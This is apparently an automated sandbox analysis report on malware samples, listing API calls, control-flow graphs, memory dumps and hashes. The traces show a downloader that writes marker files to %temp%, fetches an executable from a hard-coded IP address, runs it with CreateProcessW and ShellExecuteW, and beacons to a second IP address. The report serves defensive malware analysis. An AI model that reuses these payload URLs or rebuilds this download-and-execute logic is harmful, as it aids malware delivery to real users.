                                                                                                                                                                                              control_flow_graph 18 601000-601060 memset * 2 CreateProcessW 19 601071-601095 ShellExecuteW 18->19 20 601062-60106f Sleep 18->20 22 6010a6 19->22 23 601097-6010a4 Sleep 19->23 21 6010a8-6010ab 20->21 22->21 23->21
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCR90 ref: 0060100E
                                                                                                                                                                                              • memset.MSVCR90 ref: 0060101E
                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00601057
                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 00601067
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00601082
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0060109C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.2811489947.0000000000601000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811282068.0000000000600000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811517821.0000000000602000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811541210.0000000000604000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_600000_1091722296.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                              • String ID: $D$open
                                                                                                                                                                                              • API String ID: 3787208655-2182757814
                                                                                                                                                                                              • Opcode ID: 8d7d148888b1003d588b147763ecf7f74e71d24650457c066a66314622396d89
                                                                                                                                                                                              • Instruction ID: fc5c07d80c63e55ce9f2152ce45ae8a6b66d281ea24b46ca26101cd79a1510af
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d7d148888b1003d588b147763ecf7f74e71d24650457c066a66314622396d89
                                                                                                                                                                                              • Instruction Fuzzy Hash: D1114F71EC0308BBEB14DB90CD5AFEE777AAB15B01F200115FA096E2C0DAB15A44CB65

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006013DA
                                                                                                                                                                                              • wsprintfW.USER32 ref: 006013F3
                                                                                                                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 00601403
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00601429
                                                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF), ref: 00601445
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.2811489947.0000000000601000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811282068.0000000000600000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811517821.0000000000602000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811541210.0000000000604000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_600000_1091722296.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                              • String ID: %s\roapalr.jpg$%temp%
                                                                                                                                                                                              • API String ID: 750032643-1357684243
                                                                                                                                                                                              • Opcode ID: 9a6111c2169b7572f110953498e420622ce2091e2d54e140ff69dcf37be730dd
                                                                                                                                                                                              • Instruction ID: 0ad250f8254ea0f1824bc9e5b411cf0d6e59b68b0ccd4e3b8c2fbc5c76e3ef16
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a6111c2169b7572f110953498e420622ce2091e2d54e140ff69dcf37be730dd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C01D4B098030DABDB24CB609C4DFE7333AAF00704F0086A4A61AA60D1D6B05AC5CFA5

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 30 601360-6013ab ExpandEnvironmentStringsW wsprintfW PathFileExistsW 31 6013b1 30->31 32 6013ad-6013af 30->32 33 6013b3-6013b6 31->33 32->33
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 0060137A
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00601393
                                                                                                                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 006013A3
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.2811489947.0000000000601000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811282068.0000000000600000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811517821.0000000000602000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811541210.0000000000604000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_600000_1091722296.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnvironmentExistsExpandFilePathStringswsprintf
                                                                                                                                                                                              • String ID: %s\Program Files (x86)$%systemdrive%
                                                                                                                                                                                              • API String ID: 3337111443-1963301939
                                                                                                                                                                                              • Opcode ID: c86e2170b6c3a2045941132fa4661d343198f1ba7cefb3bb435139ad838c1e02
                                                                                                                                                                                              • Instruction ID: b1595cc649b428d758b701e7e0e3095de4371a047fa8d52e5c5277cb47d15e9f
                                                                                                                                                                                              • Opcode Fuzzy Hash: c86e2170b6c3a2045941132fa4661d343198f1ba7cefb3bb435139ad838c1e02
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98E0E5B058030E5BCB14DBA0AC5DAE7332AAF01704F004694AA1981190F6B096C8DBA1

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 34 601460-601478 Sleep call 601360 37 601493-601496 34->37 38 60147a-601484 call 6013c0 34->38 38->37 41 601486-60148b call 6010b0 38->41 43 601490 41->43 43->37
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00601468
                                                                                                                                                                                                • Part of subcall function 00601360: ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 0060137A
                                                                                                                                                                                                • Part of subcall function 00601360: wsprintfW.USER32 ref: 00601393
                                                                                                                                                                                                • Part of subcall function 00601360: PathFileExistsW.KERNELBASE(?), ref: 006013A3
                                                                                                                                                                                                • Part of subcall function 006013C0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006013DA
                                                                                                                                                                                                • Part of subcall function 006013C0: wsprintfW.USER32 ref: 006013F3
                                                                                                                                                                                                • Part of subcall function 006013C0: PathFileExistsW.KERNELBASE(?), ref: 00601403
                                                                                                                                                                                                • Part of subcall function 006010B0: GetTickCount.KERNEL32 ref: 006010B9
                                                                                                                                                                                                • Part of subcall function 006010B0: srand.MSVCR90 ref: 006010C0
                                                                                                                                                                                                • Part of subcall function 006010B0: DeleteUrlCacheEntryW.WININET(?), ref: 006010CC
                                                                                                                                                                                                • Part of subcall function 006010B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006010EA
                                                                                                                                                                                                • Part of subcall function 006010B0: rand.MSVCR90 ref: 006010F0
                                                                                                                                                                                                • Part of subcall function 006010B0: rand.MSVCR90 ref: 00601104
                                                                                                                                                                                                • Part of subcall function 006010B0: wsprintfW.USER32 ref: 0060112B
                                                                                                                                                                                                • Part of subcall function 006010B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00601141
                                                                                                                                                                                                • Part of subcall function 006010B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0060116D
                                                                                                                                                                                                • Part of subcall function 006010B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0060119C
                                                                                                                                                                                                • Part of subcall function 006010B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 006011CF
                                                                                                                                                                                                • Part of subcall function 006010B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00601200
                                                                                                                                                                                                • Part of subcall function 006010B0: CloseHandle.KERNEL32(000000FF), ref: 0060120F
                                                                                                                                                                                                • Part of subcall function 006010B0: wsprintfW.USER32 ref: 00601228
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • http://185.215.113.84/nxmr.exe, xrefs: 00601486
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.2811489947.0000000000601000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811282068.0000000000600000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811517821.0000000000602000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001B.00000002.2811541210.0000000000604000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_600000_1091722296.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$wsprintf$EnvironmentExpandInternetStrings$ExistsOpenPathrand$CacheCloseCountCreateDeleteEntryHandleReadSleepTickWritesrand
                                                                                                                                                                                              • String ID: http://185.215.113.84/nxmr.exe
                                                                                                                                                                                              • API String ID: 4035879952-3066490085
                                                                                                                                                                                              • Opcode ID: 69b31b646d2fe8d4cf2de769ede8ca907026c3c05e23b548928d315eeff5acdf
                                                                                                                                                                                              • Instruction ID: 894be4c92fa038260a25803477f97e6e9a278fae3f1f7628687f668f47030030
                                                                                                                                                                                              • Opcode Fuzzy Hash: 69b31b646d2fe8d4cf2de769ede8ca907026c3c05e23b548928d315eeff5acdf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75D0A7B55C031A61E24D32B27C2B63F31D6AE03781F40543BB4478C9D3ED44D80850B6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.2945188568.00007FF6904F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6904F0000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001C.00000002.2945124735.00007FF6904F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001C.00000002.2945210498.00007FF69050B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001C.00000002.2945241704.00007FF69050C000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001C.00000002.2945689712.00007FF690A77000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001C.00000002.2945718641.00007FF690A79000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001C.00000002.2945739905.00007FF690A82000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001C.00000002.2945765502.00007FF690A85000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001C.00000002.2945792367.00007FF690A86000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_7ff6904f0000_1239611256.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                              • Instruction ID: 7723c6fc7e7d042fac06f88fe56f996d9a20d95263a85082830fd669388a8304
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3B01231E08209F4E3102F31D84125833A4EB08B50F808070C60C433A3CE7DD0404750

                                                                                                                                                                                              Callgraph

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00C91015
                                                                                                                                                                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00C9102B
                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00C91056
                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 00C91064
                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00C9106E
                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 00C91079
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00C91086
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • http://91.202.233.141/ALLBSTATAASASD, xrefs: 00C91009
                                                                                                                                                                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 00C91026
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.2876413118.0000000000C91000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876388596.0000000000C90000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876438869.0000000000C92000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876495761.0000000000C93000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876519841.0000000000C94000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876546036.0000000000C95000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_c90000_146916724.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandleOpenSleep$wsprintf
                                                                                                                                                                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://91.202.233.141/ALLBSTATAASASD
                                                                                                                                                                                              • API String ID: 2685051180-603325175
                                                                                                                                                                                              • Opcode ID: 6dd9b7fb844807a88993c97b4d229b4a08a6f3e6ea52082d7b7f16af93ec6bdd
                                                                                                                                                                                              • Instruction ID: 3ebce66fa12dfdfbe14cd3fc79d34e821651a24d07d9b6d7f4c23ac51382ac2e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dd9b7fb844807a88993c97b4d229b4a08a6f3e6ea52082d7b7f16af93ec6bdd
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE014F74E80306BBDB259FA4DD0EF6D777CEB08B01F1011A9BA49A61D0CA706B44CF65

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00C910AA
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00C910C3
                                                                                                                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 00C910D3
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00C910F9
                                                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF), ref: 00C91115
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.2876413118.0000000000C91000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876388596.0000000000C90000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876438869.0000000000C92000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876495761.0000000000C93000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876519841.0000000000C94000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876546036.0000000000C95000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_c90000_146916724.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                              • String ID: %s\488888888888fs.txt$%temp%$@1#v.#v
                                                                                                                                                                                              • API String ID: 750032643-2224946725
                                                                                                                                                                                              • Opcode ID: d676d131959db23fe0cca0fefed4485a6777a9d996c88968693d2357a0f45ac4
                                                                                                                                                                                              • Instruction ID: 4e18ad4d2dfd25c8722b3990a130ffa774128a704f9de815fc394e7d7af7dcff
                                                                                                                                                                                              • Opcode Fuzzy Hash: d676d131959db23fe0cca0fefed4485a6777a9d996c88968693d2357a0f45ac4
                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01A2B094031CBBDF309B609C4EFE9737CAB44700F0086A5AB55A60D2DAB05BC5CFA5

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 10 c91130-c91148 Sleep call c91090 13 c9114a call c91000 10->13 14 c9114f-c91152 10->14 13->14
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00C91138
                                                                                                                                                                                                • Part of subcall function 00C91090: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00C910AA
                                                                                                                                                                                                • Part of subcall function 00C91090: wsprintfW.USER32 ref: 00C910C3
                                                                                                                                                                                                • Part of subcall function 00C91090: PathFileExistsW.KERNELBASE(?), ref: 00C910D3
                                                                                                                                                                                                • Part of subcall function 00C91000: wsprintfW.USER32 ref: 00C91015
                                                                                                                                                                                                • Part of subcall function 00C91000: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00C9102B
                                                                                                                                                                                                • Part of subcall function 00C91000: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00C91056
                                                                                                                                                                                                • Part of subcall function 00C91000: Sleep.KERNELBASE(000003E8), ref: 00C91064
                                                                                                                                                                                                • Part of subcall function 00C91000: InternetCloseHandle.WININET(?), ref: 00C9106E
                                                                                                                                                                                                • Part of subcall function 00C91000: Sleep.KERNELBASE(000003E8), ref: 00C91079
                                                                                                                                                                                                • Part of subcall function 00C91000: InternetCloseHandle.WININET(00000000), ref: 00C91086
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.2876413118.0000000000C91000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876388596.0000000000C90000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876438869.0000000000C92000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876495761.0000000000C93000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876519841.0000000000C94000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000001D.00000002.2876546036.0000000000C95000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_c90000_146916724.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$Sleep$CloseHandleOpenwsprintf$EnvironmentExistsExpandFilePathStrings
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344363592-0
                                                                                                                                                                                              • Opcode ID: 5b3a15d269286f86e88d98d4a46337790b553cd8bd5bf7c934c8edbb97cef457
                                                                                                                                                                                              • Instruction ID: 2b45add7143f1082664e6c48734132f485f419b3b11dc6a5f28423ac90c2804d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b3a15d269286f86e88d98d4a46337790b553cd8bd5bf7c934c8edbb97cef457
                                                                                                                                                                                              • Instruction Fuzzy Hash: E9C08C3110428B26A90032B26C0F72A329C4B007A2F082423B945C40C2DD42D460A0B1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001E.00000002.2939129597.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9870ac5085ea23af8fdac453681d183437d8932eb5a1ce1fada0b555937807a0
                                                                                                                                                                                              • Instruction ID: 142d8b2508ed72a0bb80801b00e2104d7d7686907d296e515e851451bacb8386
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9870ac5085ea23af8fdac453681d183437d8932eb5a1ce1fada0b555937807a0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0331F47191CB888FDB58DB5C9C4A6A97BE0FB59320F00426FE449D3252DA74A855CBC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001E.00000002.2938546851.00007FFD3467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_30_2_7ffd3467d000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b3f50582e14e65df88578e649fa684ae0b09ba490224193a1dddf40851072feb
                                                                                                                                                                                              • Instruction ID: 15241c89ba4490a2fbb1f179f1758965f83d3ea20d83ad2c63751ea22e42ec06
                                                                                                                                                                                              • Opcode Fuzzy Hash: b3f50582e14e65df88578e649fa684ae0b09ba490224193a1dddf40851072feb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E41037190DBC44FE7568B28DC959923FF0EF53324B1546EFD088CB1A3D629A84AC792
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001E.00000002.2939129597.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0db2fd184388efafc85e27566279818e33dae5dec30c30f8146380d16b46daea
                                                                                                                                                                                              • Instruction ID: b56eb255ba9e49d96ae9e8f9a9c790ca5af868cbd8a6c51e6e025a47cfc1923e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0db2fd184388efafc85e27566279818e33dae5dec30c30f8146380d16b46daea
                                                                                                                                                                                              • Instruction Fuzzy Hash: FF21297090CB4C8FDB59DFAC984A7E97BF0EB96321F00426FD449C3152D674A41ACB92
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001E.00000002.2939129597.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
                                                                                                                                                                                              • Instruction ID: e612da87be85d6dee2f80d0107349a7dabe7ee83009de2a3aaf5ed84299d1f14
                                                                                                                                                                                              • Opcode Fuzzy Hash: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B01677121CB0C8FD744EF4CE451AA5B7E0FB95364F10056EE58AC3651D636E881CB45
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001E.00000002.2939129597.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 357af8039ee569a1b53b9df6037baffca181adb66b1e9c886df2f13fb889abcd
                                                                                                                                                                                              • Instruction ID: e0a7428d32218374325ae18ef832eb9966f139132b5b27bed6cfb49c29e33b6c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 357af8039ee569a1b53b9df6037baffca181adb66b1e9c886df2f13fb889abcd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EF0E93081868ACFDB06DF3498165E67FA0FF26311F050297E458C71B2DB34A458CBC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001E.00000002.2939608899.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_30_2_7ffd34860000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5f28516970371e20011d503b0f8fb1c555b684cfd4fa772c68503d096e84690b
                                                                                                                                                                                              • Instruction ID: 92cb57ebbb7d4d48af72c505329f291255fc357bf6665f54b6049438a34bd3d8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f28516970371e20011d503b0f8fb1c555b684cfd4fa772c68503d096e84690b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F0BE32B0D9448FD7A9EB4CE4918E873E1EF4633171400BAE25DC7263DA29EC80C788
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001E.00000002.2939608899.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_30_2_7ffd34860000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2d6adc8d8ecb1b5e62aae4a3500756e0b69d7e0fa7d4df9b87f8099defc498e2
                                                                                                                                                                                              • Instruction ID: 3aebfda13e5250857e4b92ff70f4c8a1869fe56b09fffc879c679b27030461c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d6adc8d8ecb1b5e62aae4a3500756e0b69d7e0fa7d4df9b87f8099defc498e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56F0A03131CF044FE748EE2DE4496A6B3E0FBA8310F20462FE44AC3291DA21E8818782
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001E.00000002.2939608899.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_30_2_7ffd34860000_powershell.jbxd
                                                                                                                                                                                              Similarity
